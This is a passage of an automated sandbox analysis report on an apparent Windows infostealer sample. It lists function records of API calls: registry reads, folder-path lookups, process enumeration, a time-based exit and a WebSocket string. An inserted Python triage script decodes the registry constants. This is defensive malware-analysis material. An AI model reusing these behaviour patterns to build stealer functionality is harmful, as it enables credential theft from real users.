                                      • Part of subcall function 008D5BE0: lstrcat.KERNEL32(00000000,00000000), ref: 008D5CA8
                                      • Part of subcall function 008D5BE0: lstrcpy.KERNEL32(00000000,00000000), ref: 008D5CD0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$AddressProc$FolderLibraryLoadPathlstrcat
                                    • String ID:
                                    • API String ID: 38527155-0
                                    • Opcode ID: 43f151e0119da8acac3e1bf1352c472ab32fbc0f033540de431293bdac0fdd33
                                    • Instruction ID: 1b9366f41744db8984bcb1e167fe140a9e1df88f2ea87176f10aef79e5b5d2e6
                                    • Opcode Fuzzy Hash: 43f151e0119da8acac3e1bf1352c472ab32fbc0f033540de431293bdac0fdd33
                                    • Instruction Fuzzy Hash: CFF17F71A042058FCB24DF69D444B69B7B1FF48324F19C2AAD809DB392E735ED46CB81
                                    APIs
                                    • StrCmpCA.SHLWAPI(?,00538F48), ref: 008D7770
                                    • StrCmpCA.SHLWAPI(?,00539038), ref: 008D7848
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D7880
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D78DD
                                      • Part of subcall function 008E7240: lstrcpy.KERNEL32(00000000), ref: 008E725A
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C1437
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C1459
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C147B
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C14DF
                                      • Part of subcall function 008D5BE0: lstrcpy.KERNEL32(00000000,008ED014), ref: 008D5C15
                                      • Part of subcall function 008D5BE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 008D5C44
                                      • Part of subcall function 008D5BE0: lstrcpy.KERNEL32(00000000,00000000), ref: 008D5C75
                                      • Part of subcall function 008D5BE0: lstrcpy.KERNEL32(00000000,00000000), ref: 008D5C9D
                                      • Part of subcall function 008D5BE0: lstrcat.KERNEL32(00000000,00000000), ref: 008D5CA8
                                      • Part of subcall function 008D5BE0: lstrcpy.KERNEL32(00000000,00000000), ref: 008D5CD0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FolderPathlstrcat
                                    • String ID:
                                    • API String ID: 2938889746-0
                                    • Opcode ID: 38d74721d0cabcf062adfcfc71ba32073af9d0e91a31d6bd1c7e0170d13b4ba5
                                    • Instruction ID: a314c4ad03018bb834bf228a06947c06a4ae2026b2ec6787bf15608b7481a227
                                    • Opcode Fuzzy Hash: 38d74721d0cabcf062adfcfc71ba32073af9d0e91a31d6bd1c7e0170d13b4ba5
                                    • Instruction Fuzzy Hash: B7F15E71A052058FCB24DF69D444B69BBB1FF48324F19C2AAD809DB362E735ED42CB81
                                    APIs
                                    • StrCmpCA.SHLWAPI(?,00538F48), ref: 008D7770
                                    • StrCmpCA.SHLWAPI(?,00539038), ref: 008D7848
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D7880
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D78DD
                                    • StrCmpCA.SHLWAPI(?,00539018), ref: 008D7B7D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: 0be0ed01b75b3f6226121ca8b235ac5045daeaad8d7a4475bbff9703d3cbb3f5
                                    • Instruction ID: c462c7680314a45260a1738e78593637d20579722460d6d9c53202c0d1bd92a6
                                    • Opcode Fuzzy Hash: 0be0ed01b75b3f6226121ca8b235ac5045daeaad8d7a4475bbff9703d3cbb3f5
                                    • Instruction Fuzzy Hash: 66F15E71A052058FCB24DF69D444B69BBB1FF48324F19C2AAD809DB362E735ED42CB81
                                    APIs
                                    • StrCmpCA.SHLWAPI(?,00538F48), ref: 008D7770
                                    • StrCmpCA.SHLWAPI(?,00539018), ref: 008D7B7D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 35b9572ebfc0aaadd9d4b5680b1392543a9037627881e4c4d79178c927e8b910
                                    • Instruction ID: 759cc3d462547cccf89805bfe74992057851a58a821750444bf3df5024afdc39
                                    • Opcode Fuzzy Hash: 35b9572ebfc0aaadd9d4b5680b1392543a9037627881e4c4d79178c927e8b910
                                    • Instruction Fuzzy Hash: 9AE16D71A052058FCB24DF69D444B69BBB1FF48324F19C2AAD809DB362E735ED46CB81
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 008D7FB1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D7FE0
                                    • StrCmpCA.SHLWAPI(00000000,008F5204), ref: 008D8025
                                    • StrCmpCA.SHLWAPI(00000000,008F5204), ref: 008D8053
                                    • StrCmpCA.SHLWAPI(00000000,008F5204), ref: 008D8087
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: a86c745fdc53351b78e781b11d03c021d2a27c34ce7a9f05b231b2d1fbb6de50
                                    • Instruction ID: 8e86445904b60176e097b8a0b571c6d9802a78600537117d18970746b2ed3ddd
                                    • Opcode Fuzzy Hash: a86c745fdc53351b78e781b11d03c021d2a27c34ce7a9f05b231b2d1fbb6de50
                                    • Instruction Fuzzy Hash: 8941803460451ADFCB20DF68D880EAE77B4FF45304B11469AE905DB350EB71EA66CB91
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 008D814B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D817A
                                    • StrCmpCA.SHLWAPI(00000000,008F5204), ref: 008D8192
                                    • lstrlen.KERNEL32(00000000), ref: 008D81D0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D81FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: dafff0bb5b017eb0c2b8c158c602230415f8a8823221d2902dd1ee5fbdde5c32
                                    • Instruction ID: ded5eba818ac1920eefcecb5de6382ecb9c71b46477485cba65bbb908e021d0d
                                    • Opcode Fuzzy Hash: dafff0bb5b017eb0c2b8c158c602230415f8a8823221d2902dd1ee5fbdde5c32
                                    • Instruction Fuzzy Hash: 4D415B71A0050AEBCB21DFA8D984FAABBB4FF44710F15861AA855D7344EF34E946CB90
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 008E1B52
                                      • Part of subcall function 008E1800: lstrcpy.KERNEL32(00000000,008ED014), ref: 008E182F
                                      • Part of subcall function 008E1800: lstrlen.KERNEL32(005272F8), ref: 008E1840
                                      • Part of subcall function 008E1800: lstrcpy.KERNEL32(00000000,00000000), ref: 008E1867
                                      • Part of subcall function 008E1800: lstrcat.KERNEL32(00000000,00000000), ref: 008E1872
                                      • Part of subcall function 008E1800: lstrcpy.KERNEL32(00000000,00000000), ref: 008E18A1
                                      • Part of subcall function 008E1800: lstrlen.KERNEL32(008F5568), ref: 008E18B3
                                      • Part of subcall function 008E1800: lstrcpy.KERNEL32(00000000,00000000), ref: 008E18D4
                                      • Part of subcall function 008E1800: lstrcat.KERNEL32(00000000,008F5568), ref: 008E18E0
                                      • Part of subcall function 008E1800: lstrcpy.KERNEL32(00000000,00000000), ref: 008E190F
                                    • sscanf.NTDLL ref: 008E1B7A
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 008E1B96
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 008E1BA6
                                    • ExitProcess.KERNEL32 ref: 008E1BC3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 3040284667-0
                                    • Opcode ID: b9ad0b4c85ae3dec2859fa86eadf9b8d47f76e103873295070e01334fbeada5c
                                    • Instruction ID: 9b4dbf2f84461210544425747a44bb4322b161686ddcacf51b833f578b0c5f6c
                                    • Opcode Fuzzy Hash: b9ad0b4c85ae3dec2859fa86eadf9b8d47f76e103873295070e01334fbeada5c
                                    • Instruction Fuzzy Hash: 2821D0B1518341AF8750DFA9D88496BBBF8FEC9214F408A1EF599C3220EB30D505CBA2
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008E3106
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E310D
                                    • RegOpenKeyExA.ADVAPI32(80000002,0052C518,00000000,00020119,?), ref: 008E312C
                                    • RegQueryValueExA.ADVAPI32(?,0053D950,00000000,00000000,00000000,000000FF), ref: 008E3147
                                    • RegCloseKey.ADVAPI32(?), ref: 008E3151
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 5d11419a12eb1e038e67da97b0bcde62d66ae29770c70d4ec595cbcb3e3a61f0
                                    • Instruction ID: 3fa6e46b489356dea6fae9809b8c8476b604aa2dae6963158ee19c1464ca69ef
                                    • Opcode Fuzzy Hash: 5d11419a12eb1e038e67da97b0bcde62d66ae29770c70d4ec595cbcb3e3a61f0
                                    • Instruction Fuzzy Hash: 20115B72A00248AFD714CBD5DC49FBBBB78F788B10F004229FA05D3680DB755901CBA1
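                                     The two records above, the registry read at 008E3106..008E3151 and the GetSystemTime/sscanf/SystemTimeToFileTime/ExitProcess chain at 008E1B52..008E1BC3, are easier to triage once the raw argument values in the API lines are decoded: 80000002 is HKEY_LOCAL_MACHINE and 00020119 is KEY_READ | KEY_WOW64_64KEY. The following is an added example for this page, not Joe Sandbox code: it parses API lines in the report's own "• Api.DLL(args), ref: addr" shape, names the registry constants (standard winreg.h values), and checks whether a given API ordering occurs in a record. The input lines are copied from the two records on this page; the ordering check only reports what the list shows, so whether the time chain is a date gate still has to be confirmed in the disassembly.

```python
"""Parse the 'APIs' lines of a Joe Sandbox function record and decode the
Win32 constants that appear in them.

Added example for this report page; it is not Joe Sandbox code. The SAMPLE
lines are copied from two function records on this page (the registry read
at 008E3106 and the time check at 008E1B52). Constant tables are the
standard winreg.h values."""
import re
from dataclasses import dataclass, field

# Constructed input: API lines copied from this report's function records.
SAMPLE = """\
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 008E3106
• RtlAllocateHeap.NTDLL(00000000), ref: 008E310D
• RegOpenKeyExA.ADVAPI32(80000002,0052C518,00000000,00020119,?), ref: 008E312C
• RegQueryValueExA.ADVAPI32(?,0053D950,00000000,00000000,00000000,000000FF), ref: 008E3147
• RegCloseKey.ADVAPI32(?), ref: 008E3151
• GetSystemTime.KERNEL32(?), ref: 008E1B52
• sscanf.NTDLL ref: 008E1B7A
• SystemTimeToFileTime.KERNEL32(?,?), ref: 008E1B96
• SystemTimeToFileTime.KERNEL32(?,?), ref: 008E1BA6
• ExitProcess.KERNEL32 ref: 008E1BC3
"""

# Report line shape: "• Api.DLL(arg,arg), ref: 00401000". The argument list and
# the comma before "ref:" are both optional (compare the sscanf line above).
LINE_RE = re.compile(
    r"^\s*•\s*(?P<api>[\w:]+)\.(?P<dll>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

HKEY_NAMES = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
}

# Registry access-mask bits from winreg.h. KEY_READ (0x20019) is the union of
# STANDARD_RIGHTS_READ, KEY_QUERY_VALUE, KEY_ENUMERATE_SUB_KEYS and KEY_NOTIFY.
KEY_RIGHTS = (
    (0x20000, "STANDARD_RIGHTS_READ"),
    (0x00001, "KEY_QUERY_VALUE"),
    (0x00002, "KEY_SET_VALUE"),
    (0x00004, "KEY_CREATE_SUB_KEY"),
    (0x00008, "KEY_ENUMERATE_SUB_KEYS"),
    (0x00010, "KEY_NOTIFY"),
    (0x00020, "KEY_CREATE_LINK"),
    (0x00100, "KEY_WOW64_64KEY"),
    (0x00200, "KEY_WOW64_32KEY"),
)
KEY_READ = 0x20019


@dataclass
class ApiCall:
    api: str
    dll: str
    args: list = field(default_factory=list)   # raw hex strings, or "?" if unknown
    ref: int = 0                               # call-site address

    def arg_int(self, i):
        """Argument i as an int, or None when it is '?' or absent."""
        if i >= len(self.args) or self.args[i] == "?":
            return None
        return int(self.args[i], 16)


def parse_calls(text):
    """Parse every API line in `text`; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["api"], m["dll"], args, int(m["ref"], 16)))
    return calls


def decode_access(mask):
    """Name the bits of a registry access mask; KEY_READ collapses to one name."""
    names = []
    if mask & KEY_READ == KEY_READ:
        names.append("KEY_READ")
        mask &= ~KEY_READ
    for bit, name in KEY_RIGHTS:
        if mask & bit:
            names.append(name)
            mask &= ~bit
    if mask:                      # leftover bits we have no name for
        names.append(f"0x{mask:x}")
    return names


def describe_reg_open(call):
    """For RegOpenKeyEx[A/W]: (root key name, decoded samDesired list)."""
    root = call.arg_int(0)
    root_name = "?" if root is None else HKEY_NAMES.get(root, f"0x{root:x}")
    return root_name, decode_access(call.arg_int(3) or 0)


def calls_in_order(calls, sequence):
    """True if the API names in `sequence` occur in that relative order."""
    want = list(sequence)
    for c in calls:
        if want and c.api == want[0]:
            want.pop(0)
    return not want


if __name__ == "__main__":
    calls = parse_calls(SAMPLE)
    for c in calls:
        if c.api.startswith("RegOpenKeyEx"):
            root, access = describe_reg_open(c)
            print(f"{c.ref:08X} {c.api}: root={root}, access={'|'.join(access)}")
    print("GetSystemTime -> SystemTimeToFileTime -> ExitProcess present:",
          calls_in_order(calls, ["GetSystemTime", "SystemTimeToFileTime", "ExitProcess"]))
```

Run against the whole "APIs" section of a report to get every RegOpenKeyEx root and access mask in one pass; the KEY_WOW64_64KEY bit is worth noting on a 32-bit sample such as this one, since it means the code deliberately reads the 64-bit view of the hive rather than the redirected WOW64 view.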
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Type
                                    • String ID:
                                    • API String ID: 2109742289-3916222277
                                    • Opcode ID: 1743e421b660dcb7d10562a40101a96802dacd54a789d457401728679087c572
                                    • Instruction ID: 9edb490bf84ddecaf29094d98156a2b98dc76bcebb446c2d8d2f5be66d0168f4
                                    • Opcode Fuzzy Hash: 1743e421b660dcb7d10562a40101a96802dacd54a789d457401728679087c572
                                    • Instruction Fuzzy Hash: 0541F7715047DCAEDF318B258C84FFB7BE8EB46304F1444E8EAD6C6042E2B19A458F20
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008C89C6
                                      • Part of subcall function 008EA1F0: std::exception::exception.LIBCMT ref: 008EA205
                                      • Part of subcall function 008EA1F0: std::exception::exception.LIBCMT ref: 008EA22B
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008C89FD
                                      • Part of subcall function 008EA1A3: std::exception::exception.LIBCMT ref: 008EA1B8
                                      • Part of subcall function 008EA1A3: std::exception::exception.LIBCMT ref: 008EA1DE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                    • String ID: invalid string position$string too long
                                    • API String ID: 2002836212-4289949731
                                    • Opcode ID: d904d9717ceadf16ffedc5736514262c9e8527c8570a3fe6380f7f0434e82a0a
                                    • Instruction ID: 1a312cb055314364404a7d4f04c4cf77b831641b81ee47f2f5bb7bcfc6c2728f
                                    • Opcode Fuzzy Hash: d904d9717ceadf16ffedc5736514262c9e8527c8570a3fe6380f7f0434e82a0a
                                    • Instruction Fuzzy Hash: 62219472340664DBC7219A6CE840F6AF7B9FBA1761B20092FF152CB651DF71DC4183AA
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008C88B3
                                      • Part of subcall function 008EA1A3: std::exception::exception.LIBCMT ref: 008EA1B8
                                      • Part of subcall function 008EA1A3: std::exception::exception.LIBCMT ref: 008EA1DE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Similarity
                                    • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                    • String ID: vector<T> too long$yxxx$yxxx
                                    • API String ID: 2002836212-1517697755
                                    • Opcode ID: 11d19f42baa333abdf641e8abe3a3240ccc252acc2dda85721d5246c164cf7ef
                                    • Instruction ID: 1de3936ba86a1ce148b5b1e5efbf41aef9d0870872f82f94000c3e512301e2a4
                                    • Opcode Fuzzy Hash: 11d19f42baa333abdf641e8abe3a3240ccc252acc2dda85721d5246c164cf7ef
                                    • Instruction Fuzzy Hash: 413186B5E005199BCB08DF58C891BADBBB6FB88310F148269E915EB344DB30E901CB91
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008E5942
                                      • Part of subcall function 008EA1A3: std::exception::exception.LIBCMT ref: 008EA1B8
                                      • Part of subcall function 008EA1A3: std::exception::exception.LIBCMT ref: 008EA1DE
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008E5955
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_std::exception::exception
                                    • String ID: Sec-WebSocket-Version: 13$string too long
                                    • API String ID: 1928653953-3304177573
                                    • Opcode ID: 8d50b81ab431076e8fddef9414358913b8db48bd237df14440d76572e96b37f6
                                    • Instruction ID: 0fc529c6990bf7df02938b629aeaee5a2df33a4d3ca401de3d85c5c5f5957c29
                                    • Opcode Fuzzy Hash: 8d50b81ab431076e8fddef9414358913b8db48bd237df14440d76572e96b37f6
                                    • Instruction Fuzzy Hash: 99117031304B84CBD7219B2DF800B597BE1FBD2B24F240A5DE1A1CB786DB61D84187A5
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,008EA460,000000FF), ref: 008E3CC0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E3CC7
                                    • wsprintfA.USER32 ref: 008E3CD7
                                      • Part of subcall function 008E7210: lstrcpy.KERNEL32(00000000,ERROR), ref: 008E722E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: 60c3b0d9fa0102de440fcecadf497beccb46703ea44f2b09999e3800524c911b
                                    • Instruction ID: b00f93f73dcfa0161c8a7586db2e92b6b2c10183e410ce58a20b489f6b090037
                                    • Opcode Fuzzy Hash: 60c3b0d9fa0102de440fcecadf497beccb46703ea44f2b09999e3800524c911b
                                    • Instruction Fuzzy Hash: F0010072640244BFE7209BD5DC0AF7BBBA8FB46B61F000114FA01D72D0CBB81801CAA5
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008C8767
                                      • Part of subcall function 008EA1A3: std::exception::exception.LIBCMT ref: 008EA1B8
                                      • Part of subcall function 008EA1A3: std::exception::exception.LIBCMT ref: 008EA1DE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Similarity
                                    • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                    • String ID: vector<T> too long$yxxx$yxxx
                                    • API String ID: 2002836212-1517697755
                                    • Opcode ID: 76aaeef3d1c5d2758f9141dfb0ec764875480b5cc60282fe895dc8552576b622
                                    • Instruction ID: 6922485b36e817f5e13690a243d311881d17e404d8f0c835d9e25d8dee1ad9a6
                                    • Opcode Fuzzy Hash: 76aaeef3d1c5d2758f9141dfb0ec764875480b5cc60282fe895dc8552576b622
                                    • Instruction Fuzzy Hash: 15F09027B900359B8314A43E8D8499EA966F6E539033AD729E916EF348EC30EC8281D1
                                    APIs
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008DE68B
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DE6C0
                                    • lstrcat.KERNEL32(?,00000000), ref: 008DE6CC
                                    • lstrcat.KERNEL32(?,0053D710), ref: 008DE6E5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Similarity
                                    • API ID: lstrcat$FolderPathlstrcpy
                                    • String ID:
                                    • API String ID: 818526691-0
                                    • Opcode ID: 1a2af593530dcaf917f8932dc8fe0685142029c202dfa82282fe29b27a03fa62
                                    • Instruction ID: 493aa1beec78b15cfcee29e289fe939963c14c04508af49eaa8979dc420a749d
                                    • Opcode Fuzzy Hash: 1a2af593530dcaf917f8932dc8fe0685142029c202dfa82282fe29b27a03fa62
                                    • Instruction Fuzzy Hash: 9C517D71200204AFD754EBA8D846FBE77B9FB84350F40892DB955C7392DE34E91ACB92
                                    APIs
                                    Strings
                                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 008E1F5F, 008E1F75, 008E2037
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Similarity
                                    • API ID: strlen
                                    • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                    • API String ID: 39653677-4138519520
                                    • Opcode ID: 2dcb5718259c636d01a124bc3db48be67cf2cdc91f3817d047b7511e7d8610b3
                                    • Instruction ID: 0e9b8859afbf3c03fa6d03a337f51d3d134b0f9f32faec16b6f59e8985f6d305
                                    • Opcode Fuzzy Hash: 2dcb5718259c636d01a124bc3db48be67cf2cdc91f3817d047b7511e7d8610b3
                                    • Instruction Fuzzy Hash: AC2199399106CC8ACB20EB77C4587ECF7ABFF86365F844056C918CB282E335090AD795
                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 008E44B2
                                    • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 008E44CD
                                    • CloseHandle.KERNEL32(00000000), ref: 008E44D4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008E4507
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Similarity
                                    • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                    • String ID:
                                    • API String ID: 4028989146-0
                                    • Opcode ID: e1e46c3fa22c1cfe39d62d56285d6710e2df33a77b1a694872fbe6743a6266ae
                                    • Instruction ID: c6a25389676497485e8a5fa509834bb59e63b9d4ee9bbf787c28462bf874cce5
                                    • Opcode Fuzzy Hash: e1e46c3fa22c1cfe39d62d56285d6710e2df33a77b1a694872fbe6743a6266ae
                                    • Instruction Fuzzy Hash: E2F0F6B09022556FE721EBF59C49BF6BAA8FF16704F0041A1FA89D61C0DBB08C85C794
                                    APIs
                                    • __getptd.LIBCMT ref: 008E900D
                                      • Part of subcall function 008E882F: __amsg_exit.LIBCMT ref: 008E883F
                                    • __getptd.LIBCMT ref: 008E9024
                                    • __amsg_exit.LIBCMT ref: 008E9032
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 008E9056
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: fe0ecb552ddce55f67d18402af6e1faf7a8cf7d1ef4b6a0291cc2977c9af9d29
                                    • Instruction ID: 01d31ea8b2dd80b413181b54f86922c0e015af27838177fe388db6c223cca6eb
                                    • Opcode Fuzzy Hash: fe0ecb552ddce55f67d18402af6e1faf7a8cf7d1ef4b6a0291cc2977c9af9d29
                                    • Instruction Fuzzy Hash: 71F09632908BA0DAEB60B77E5807B5D33A0FF02721F510159F444E62D2CFA85D00D657
                                    APIs
                                    • lstrlen.KERNEL32(------,008C5B1B), ref: 008E734B
                                    • lstrcpy.KERNEL32(00000000), ref: 008E736F
                                    • lstrcat.KERNEL32(?,------), ref: 008E7379
                                    Memory Dump Source
